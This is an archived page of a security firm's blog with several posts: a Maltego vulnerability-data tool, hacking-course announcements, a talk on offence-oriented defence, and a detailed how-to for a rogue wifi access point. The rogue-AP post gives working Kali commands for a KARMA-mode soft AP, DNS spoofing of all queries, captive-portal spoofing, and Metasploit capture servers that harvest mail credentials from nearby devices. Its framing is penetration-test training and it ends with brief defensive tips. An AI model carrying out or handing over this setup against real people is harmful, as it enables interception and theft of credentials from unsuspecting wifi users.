Grey bar Blue bar
Share this:

Fri, 13 Jun 2014

Using Maltego to explore threat & vulnerability data

This blog post is about the process we went through trying to better interpret the masses of scan results that automated vulnerability scanners and centralised logging systems produce. A good example of the value in getting actionable items out of this data is the recent Target compromise. Their scanning solutions detected the threat that lead to their compromise, but no humans intervened. It's suspected that too many security alerts were being generated on a regular basis to act upon.


The goal of our experiment was to steer away from the usual data interrogation questions of "What are the top N vulnerabilities my scanner has flagged with a high threat?" towards questions like "For how many of my vulnerabilities do public exploits exist?". Near the end of this exercise we stumbled across this BSides talk "Stop Fixing All The Things". Theses researchers took a similar view-point: "As security practitioners, we care about which vulnerabilities matter". Their blog post and video are definitely worth having a look at.


At SensePost we have a Managed Vulnerability Scanning service (MVS). It incorporates numerous scanning agents (e.g. Nessus, Nmap, Netsparker and a few others), and exposes an API to interact with the results. This was our starting point to explore threat related data. We could then couple this data with remote data sources (e.g. CVE data, exploit-db.com data).


We chose to use Maltego to explore the data as it's an incredibly powerful data exploration and visualisation tool, and writing transforms is straight forward. If you'd like to know more about Maltego here are some useful references:


What we ended up building were:

  • Transforms to explore our MVS data

  • A CVE / exploit-db.com API engine

  • Transforms to correlate between scanner data and the created APIs

  • Maltego Machines to combine our transforms


So far our API is able to query a database populated from CVE XML files and data from www.exploit-db.com (they were kind enough to give us access to their CVE inclusive data set). It's a standalone Python program that pulls down the XML files, populates a local database, and then exposes a REST API. We're working on incorporating other sources - threat feeds, other logging/scanning systems. Let us know if you have any ideas. Here's the API in action:


Parsing CVE XML data and exposing REST API
Parsing CVE XML data and exposing REST API


Querying a CVE. We see 4 public exploits are available.
Querying a CVE. We see 4 public exploits are available.


It's also worth noting that for the demonstrations that follow we've obscured our clients' names by applying a salted 'human readable hash' to their names. A side effect is that you'll notice some rather humorous entries in the images and videos that follow.


Jumping into the interesting results, these are some of the tasks that we can perform:


  • Show me all hosts that have a critical vulnerability within the last 30 days

  • Show me vulnerable hosts for which public exploit code exists

  • Show me all hosts for which a vulnerability exists that has the word 'jmx-console' in the description

  • Show me all hosts on in my DMZ that have port 443 open

  • Given a discovered vulnerability on a host, show me all other hosts with the same vulnerability

  • Show me a single diagram depicting every MVS client, weighted by the threat of all scans within the last week

  • Show me a single diagram depicting every MVS client, weighted by the availability of public exploit code

  • Given a CPE, show me all hosts that match it


Clicking the links in the above scenarios will display a screenshot of a solution. Additionally, two video demonstrations with dialog are below.


Retrieving all recent vulnerabilities for a client 'Bravo Tango', and checking one of them to see if there's public exploit code available.
Retrieving all recent vulnerabilities for a client 'Bravo Tango', and checking one of them to see if there's public exploit code available.


Exploring which clients/hosts have which ports open
Exploring which clients/hosts have which ports open


In summary, building 'clever tools' that allow you to combine human insight can be powerful. An experiences analyst with the ability to ask the right questions, and building tools that allows answers to be easily extracted, yields actionable tasks in less time. We're going to start using this approach internally to find new ways to explore the vulnerability data sets of our scanning clients and see how it goes.


In the future, we're working on incorporating other data sources (e.g. LogRhythm, Skybox). We're also upgrading our MVS API - you'll notice a lot of the Maltego queries are cumbersome and slow due to its current linear exploration approach.


The source code for the API, the somewhat PoC Maltego transforms, and the MVS (BroadView) API can be downloaded from our GitHub page, and the MVS API from here. You'll need a paid subscription to incorporate the exploit-db.com data, but it's an initiative definitely worth supporting with a very fair pricing model. They do put significant effort in correlating CVEs. See this page for more information.


Do get in touch with us (or comment below) if you'd like to know more about the technical details, chat about the API (or expand on it), if this is a solution you'd like to deploy, or if you'd just like to say "Hi".

Tue, 13 May 2014

BlackOps Hacking Training - Las Vegas

Get some.


BlackOps you say?
At SensePost we have a range of courses in our Hacking by Numbers reloaded series. We feel each one has its own special place. I've delivered almost all the courses over the years, but my somewhat biased favourite is our recently updated BlackOps Edition. Myself (Glenn) and Vlad will be presenting this course at BlackHat Vegas in August.


Where Does BlackOps fit in?
Our introductory courses (Cadet and Bootcamp) are meant to establish the hacker mindset - they introduce the student to psychological aspects of an attacker, and build on that to demonstrate real world capability. BlackOps is designed for students who understand the basics of hacking (either from attending Bootcamp/Cadet, or from real-world experience) and want to acquire deeper knowledge of techniques we use. We built the course based on our 13 years of experience of performing security assessments.


But really, what's the course about?
This course is aimed at those who've been performing penetration testing for a while, but still feel a bit lost when they've compromised a host, or network and want to know the best possible approach to take for the next step. All of the labs in this course come from real life assessments, with the final lab being a full-blown social engineering attack against an admin with pivoting, exfiltration and the works. Specifically, we're going to cover the following topics:


1. Advanced Targeting
A hacker who can quickly and effectively identify targets is a successful attacker. We'll be looking at non-standard techniques for identifying targets, such as mDNS, IPv6, and other rapid reconnaissance techniques.


3. Compromise
You may know how to roll a generic metasploit payload, but we'll be looking at some lesser utilised approaches to compromise. From WPAD injection, to rogue routers in IPv6, to good old smbrelay attacks, to crypto attacks against obfuscated credentials.


4. Privilege Escalation
So you've gotten a shell, now what?
Following on somewhat succinctly, how do you elevate your privileges after compromising a box? Everyone wants to be root or enterprise admin, but how do you go about this without raising the alarm and keeping your shell?


5. Pivoting
Don't underestimate the importance, or intricacies of this topic. Once you've compromised a lowly network edge server, or the receptionist PC, how do you bounce through that box to get to the good stuff, three DMZs deep? We'll show you how. A must-have for every hackers box of tricks.


6. Open Source Intelligence (OSINT)
Finding out as much as possible about an adversary from publicly available information is one of the most important steps of any hack. This relates to both infrastructure (domains, IP ranges, etc) and personnel. In this section we'll focus mainly on the latter. How can you find out more information about the girlfriend of the son of your target company's CEO? We'll show you. Why would you want to? A good social engineering attack abuses trust relationships, so nothing makes a dad click on that dodgy looking email if it was from his son.


7. HIPS Evasion
Hackers don't like getting caught. So we'll teach you how to evade 100% (yes, 100%) of anti-virus products on the market, as well as hiding from smart traffic filtering devices. Bring your own ninja outfits, we'll provide the skill-set.


8. Client Side Attacks
The weakest layer of the OSI stack - the human. Trust us, if you really want to compromise an organization, going after the receptionist's outdated Windows box is the first stepping stone. After all, why wouldn't she open an email that appears to come from her boss, and has a harmless .xls attached?


Each module of the above modules has a theory section followed by a practical lab to allow you to practise your newly acquired skills. The course finishes with a Capture-the-Flag, with a grand prize. Honestly, this final lab is enjoyable and guaranteed to bring a smile on your face whilst doing it.


We're looking forward to sharing out knowledge, experience, and passion for security with you. Please sign up here.


-Glenn & Vlad

Fri, 6 Sep 2013

Offence oriented defence

We recently gave a talk at the ITWeb Security Summit entitled "Offense Oriented Defence". The talk was targeted at defenders and auditors, rather then hackers (the con is oriented that way), although it's odd that I feel the need to apologise for that ;)


The talks primary point, was that by understanding how attackers attack, more innovative defences can be imagined. The corollary was that common defences, in the form of "best practise" introduce commonality that is more easily exploited, or at least degrade over time as attackers adapt. Finally, many of these "security basics" are honestly hard, and we can't place the reliance on them we'd hoped. But our approach doesn't seem to want to acknowledge the problem, and much like an AA meeting, it's time we recognise the problem.


If you had to look at the average security strategy or budget items, you often end up with a list containing a couple of these:


  • Compliance/GRC - building policies, auditing against them, responding to audits

  • Risk Management - enumerating and ranking all the info sec risks, prioritising them, and justifying spend to mitigate

  • Best Practises - strengthening passwords, pushing patches, configuration management, etc.

  • Technology - cue buzzwords - UTM, WAF, DLP, DAM, SIEM, IPS, AV

  • Staff - everyone needed to get the above stuff done: compliance specialists, risk specialist, security managers, device ops managers


But, the truth is many of these items don't actually block attacks, or the few that do, don't really counter the common bypassed used to side-step them. For example:


  • It's really hard to link risk-based priorities to meaningful technical priorities.

  • Compliance drives a "teach the test" approach with little incentive to create contradictory measurements.

  • Then how can we have a bunch of things called "best practise" when we can't honestly say we know how to defend. Even then, some BPs are practically impossible to achieve in anything but a point in time. And the main point of this talk; common practises have common bypasses.


The current place we seem to be in is akin to having everyone build a wall. Attackers get to evaluate the wall, figure out how to get over it, and add to their capability (i.e. get a longer rope). But once they have a longer rope, they can use it over and over again, and against more than one wall. So attackers, who are quite good at sharing, get to keep building their tool chain, while all defenders can do it to keep building a higher wall, and maintaining the increasingly untenable structure. By understanding how attackers attack, we can break out of this and try more innovative approaches.


The talk is illustrated with four broad examples: Passwords, Patches, Anti-Virus and DMZs. For each, the belief around specific configurations is discussed, and how those don't stand up to how attackers actually attack. For example, the way AV's believed to work doesn't seem to correspond with how easy they are to bypass, or the common configuration of standard password controls such as lockout, don't seem to take into account horizontal brute-force attacks.


The point I want to make here is somewhat subtle; if you walk away thinking I've described new attacks, then you've missed it, if you think I'm recommending "the basics" then you've missed it. Truthfully, maybe it's just that I didn't make it very well ... decide for yourself, here are the slides:

Thu, 5 Sep 2013

44CON 2013

In one week, it's 44CON time again! One of our favourite UK hacker cons. In keeping with our desire to make more hackers, we're giving several sets of training courses as well as a talk this year.


Training: Hacking by Numbers - Mobile Edition


If you're in a rush, you can book here.


We launched it at Blackhat USA, and nobody threw anything rotting, in-fact some said it went pretty well; our latest addition to the Hacking by Numbers training.


We created the course to share our experience testing mobile applications and platforms, and well, because lots of people asked us to. The course shows you how to test mobile platforms and installed applications for vulnerabilities. HBN Mobile provides a pretty complete and practical overview into the methods used when attacking mobile platforms and presents you with a methodology that can be applied across platforms (although we focus on iOS and Android). This course is mostly for existing penetration testers who are new to the mobile area looking to learn how to understand, analyse and audit applications on various mobile platforms.


For more information about the course, and to book a place, head over here.


Workshop: Malware Reverse Engineering


If we were marketing to hipsters, we'd use words like “bespoke” and “handcrafted” to describe this workshop. While it's not made out of yams, it was put together especially for 44con.


Inaki and Siavosh's workshop will cut through the black-magic often associated with reverse engineering and malware. Advanced attacks usually have some form of malware involved, and learning to pull these apart to understand the kill chain is an increasingly vital skill.


Using real malware used in attacks against large corporates, students will look at both behavioural analysis and code analysis, to determine what the malware does.


If you're keen to attend, speak to the 44con crew at the front desk on arrival.


Talk: 'Honey, I'm Home' - Hacking Zwave Home Automation Systems


Behrang and Sahand will be presenting the results of their research into smart homes on day two at 09:30am.


“Smart homes” employing a variety of home automation systems are becoming increasingly common. Heating, ventilation, security and entertainment systems are centrally controlled with a mixture of wired and wireless networking. In 2011 the UK market for home automation products was estimated at GBP 65 million, an increase of 12% on the previous year, with the US market exceeding $3 billion. Zigbee and Z-Wave wireless protocols underpin most home automation systems. Z-Wave is growing in popularity as it does not conflict with existing 2.4GHz WiFi and Bluetooth systems.


Their talk describes the Z-Wave protocol and a number of weaknesses, including how to build a low-cost attack kit to perform packet capture and injection, along with potential attacks on the AES crypto implementation. Bottom line: they can walk up to a house, disable security sensors, then open the front door. LIKE A BOSS

Fri, 12 Jul 2013

Rogue Access Points, a how-to

In preparation for our wireless training course at BlackHat Vegas in a few weeks, I spent some time updating the content on rogue/spoofed access points. What we mean by this are access points under your control, that you attempt to trick a user into connecting to, rather than the "unauthorised access points" Bob in Marketing bought and plugged into your internal network for his team to use.


I'll discuss how to quickly get a rogue AP up on Kali that will allow you to start gathering some creds, specifically mail creds. Once you have that basic pattern down, setting up more complex attacks is fairly easy.


This is a fairly detailed "how-to" style blog entry that gives you a taste of what you can grab on our training course.


Preparation


First up, you'll need a wireless card that supports injection. The aircrack forums maintain a list. I'm using the Alfa AWUS036H. Students on our course each get one of these to keep. We buy them from Rokland who always give us great service.


Second, you'll need a laptop running Kali. The instructions here are pretty much the same for BackTrack (deprecated, use Kali).


For this setup, you won't need upstream internet connectivity. In many ways setting up a "mitm" style rogue AP is much easier, but it requires that you have upstream connectivity which means you have to figure out an upstream connection (if you want to be mobile this means buying data from a mobile provider) and prevents you from using your rogue in funny places like aeroplanes or data centres. We're going to keep things simple.


Finally, you'll need to install some packages, I'll discuss those as we set each thing up.


Overview


We're going to string a couple of things together here:


Access Point <-> routing & firewalling <-> DHCP <-> spoof services (DNS & mail)


There are several ways you can do each of these depending on preference and equipment. I'll cover some alternatives, but here I'm going for quick and simple.


Access Point


Ideally, you should have a fancy wifi card with a Prism chipset that you can put into master mode, and have (digininja's karma patched) hostapd play nicely with. But, we don't have one of those, and will be using airbase-ng's soft ap capability. You won't get an AP that scales particularly well, or has decent throughput, or even guarantees that people can associate, but it's often good enough.


For this section, we'll use a few tools:


  • airbase-ng (via the aircrack-ng suite)

  • macchanger

  • iw


You can install these with: apt-get install aircrack-ng macchanger iw


First, let's practise some good opsec and randomise our MAC address, then, while we're at it, push up our transmit power. Assuming our wifi card has shown up as the device wlan0 (you can check with airmon-ng), we'll run:

ifconfig wlan0 down
macchanger -r wlan0 #randomise our MAC
iw reg set BO #change our regulatory domain to something more permissive
ifconfig wlan0 up
iwconfig wlan0 txpower 30 #1Watt transmit power


Right, now we can set up the AP using airbase. We have some options, with the biggest being whether you go for a KARMA style attack, or a point-network spoof.

airmon-ng start wlan0 #Put our card into monitor mode
airbase-ng -c6 -P -C20 -y -v mon0& #Set up our soft AP in karma mode
#airbase-ng -c6 -e "Internet" -v mon0& #Alternatively, set up our soft AP for 1 net (no karma)


Airbase has a couple of different ways to work. I'll explain the parameters:


  • -c channel, check which channel is the least occupied with airodump

  • -P (karma mode) respond to all probes i.e. if a victim's device is usually connects to the open network "Internet" it will probe to see if that network is nearby. Our AP will see the probe and helpfully respond. The device, not knowing that this isn't an ESS for the Internet network, will join our AP.

  • -y don't respond to broadcast probes, aka the "is there anyone out there" shout of wifi. This helps in busy areas to reduce the AP's workload

  • -C20 after a probed for network has been seen, send beacons with that network name out for 20 seconds afterwards. If you're having trouble connecting, increasing this can help, but not much

  • -v be verbose

  • -e "Internet" pretend to be a specific fake ESSID. Using airodump and monitoring for probed networks from your victim, and just pretending to be that network (i.e. drop -P and -y) can increase reliability for specific targets.


If you're putting this into a script, make sure to background the airbase process (the &). At this point, you should have an AP up and running.


Routing & IP Time


There are lots of options here, you could bridge the AP and your upstream interface, you could NAT (NB you can't NAT from wifi to wifi). We're not using an upstream connection, so things are somewhat simpler, we're just going to give our AP an IP and add a route for it's network. It's all standard unix tools here.


The basics:

ifconfig at0 up 10.0.0.1 netmask 255.255.255.0
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
echo '1' > /proc/sys/net/ipv4/ip_forward


This is good enough for our no upstream AP, but if you wanted to use an upstream bridge, you could use the following alternates:

apt-get install bridge-utils #To get the brctl tool, only run this once
brctl addbr br0
brctl addif br0 eth0 #Assuming eth0 is your upstream interface
brctl addif br0 at0
ifconfig br0 up


If you wanted to NAT, you could use:

iptables --policy INPUT ACCEPT #Good housekeeping, clean the tables first
iptables --policy OUTPUT ACCEPT #Don't want to clear rules with a default DENY
iptables --policy FORWARD ACCEPT
iptables -t nat -F
iptables -F
#The actual NAT stuff
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
iptables -A FORWARD -i at0 -o eth0 -j ACCEPT


Legitimate Services
We need to have a fully functioning network, which requires some legitimate services. For our purposes, we only really need one, DHCP. Metasploit does have a dhcpd service, but it seems to have a few bugs. I'd recommend using the standard isc-dhcp-server in Kali which is rock solid.



apt-get install isc-dhcp-server #Only run this once
cat >> dhcpd.conf #We need to write the dhcp config file
authoritative;
subnet 10.0.0.0 netmask 255.255.255.0 {
range 10.0.0.100 10.0.0.254;
option routers 10.0.0.1;
option domain-name-servers 10.0.0.1;
}^D #If you chose this method of writing the file, hit Ctrl-D
dhcpd -cf dhcpd.conf


Evil Services


We're going to cover three evil services here:


  • DNS spoofing

  • Captive portal detection avoidance

  • Mail credential interception services


DNS spoofing


Once again, there are a couple of ways you can do DNS spoofing. The easiest is to use Dug Song's dnsspoof. An alternative would be to use metasploit's fakedns, but I find that makes the metasploit output rather noisy. Since there's no upstream, we'll just spoof all DNS queries to point back to us.



apt-get install dsniff #Only run the first time :)
cat >> dns.txt
10.0.0.1 *
^D #As in hit Ctrl-C
dnsspoof -i at0 -f dns.txt& #Remember to background it if in a script


Captive Portal Detection Avoidance


Some OS's will try to detect whether they have internet access on first connecting to a network. Ostensibly, this is to figure out if there's a captive portal requiring login. The devices which do this are Apple, BlackBerry and Windows. Metasploit's http capture server has some buggy code to try and deal with this, that you could use, however, I find the cleanest way is to just use apache and create some simple vhosts. You can download the apache config from here.



apt-get install apache2
wget http://www.sensepost.com/blogstatic/2013/07/apache-spoof_captive_portal.tar.gz
cd /
tar zcvf ~/apache-spoof_captive_portal.tar.gz
service apache start


This will create three vhosts (apple, blackberry & windows) that will help devices from those manufacturers believe they are on the internet. You can easily extend this setup to create fake capture pages for accounts.google.com, www.facebook.com, twitter.com etc. (students will get nice pre-prepared versions that write to msf's cred store). Because dnsspoof is pointing all queries back to our host, requests for www.apple.com will hit our apache.


Mail credential interception


Next up, let's configure the mail interception. Here we're going to use metasploit's capture server. I'll show how this can be used for mail, but once you've got this up, it's pretty trivial to get the rest up too (ala karmetasploit).


All we need to do, is create a resource script, then edit it with msfconsole:



cat >> karma-mail.rc
use auxiliary/server/capture/imap
exploit -j


use auxiliary/server/capture/pop3
exploit -j


use auxiliary/server/capture/smtp
exploit -j


use auxiliary/server/capture/imap
set SRVPORT 993
set SSL true
exploit -j


use auxiliary/server/capture/pop3
set SRVPORT 995
set SSL true
exploit -j



use auxiliary/server/capture/smtp
set SRVPORT 465
set SSL true
exploit -j
^D #In case you're just joining us, yes that's a Ctrl-D
msfconsole -r mail-karma.rc #Fire it up


This will create six services listening on six different ports. Three plain text services for IMAP, POP3, and SMTP, and three SSL enabled versions (although, this won't cover services using STARTTLS). Metasploit will generate random certificates for the SSL. If you want to be smart about it, you can use your own certificates (or CJR's auxiliar/gather/impersonate_ssl). Once again, because dnsspoof is pointing everything at us, we can just wait for connections to be initiated. Depending on the device being used, user's usually get some sort of cert warning (if your cert isn't trusted). Apple devices give you a fairly big obvious warning, but if you click it once, it will permanently accept the cert and keep sending you creds, even when the phone is locked (yay). Metasploit will proudly display them in your msfconsole session. For added certainty, set up a db so the creds command will work nicely.


Protections


When doing this stuff, it's interesting to see just how confusing the various warnings are from certain OS'es and how even security people get taken sometimes. To defend yourself, do the following:


  • Don't join "open" wifi networks. These get added to your PNL and probed for when you move around, and sometimes hard to remove later.

  • Remove open wifi networks from your remembered device networks. iOS in particular makes it really hard to figure out which open networks it's saved and are probing for. You can use something like airbase to figure that out (beacon out for 60s e.g.) and tell the phone to "forget this network".

  • Use SSL and validate the *exact* certificate you expect. For e.g. my mail client will only follow through with it's SSL negotiation if the *exact* certificate it's expecting is presented. If I join a network like this, it will balk at the fake certificate without prompting. It's easy, when you're in a rush and not thinking, to click other devices "Continue" button.


Conclusion


By this point, you should have a working rogue AP setup, that will aggressively pursue probed for networks (ala KARMA) and intercept mail connections to steal the creds. You can run this thing anywhere there are mobile devices (like the company canteen) and it's a fairly cheap way to grab credentials of a target organisation.


This setup is also remarkably easy to extend to other uses. We briefly looked at using bridging or NAT'ting to create a mitm rogue AP, and I mentioned the other metasploit capture services as obvious extensions. You can also throw in tools like sslstrip/sslsniff.


If you'd like to learn more about this and other wifi hacking techniques, then check out our Hacking by Numbers - Unplugged edition course at Black Hat. We've got loads of space.


If you'd like to read more, taddong's RootedCon talk from this year is a good place to start.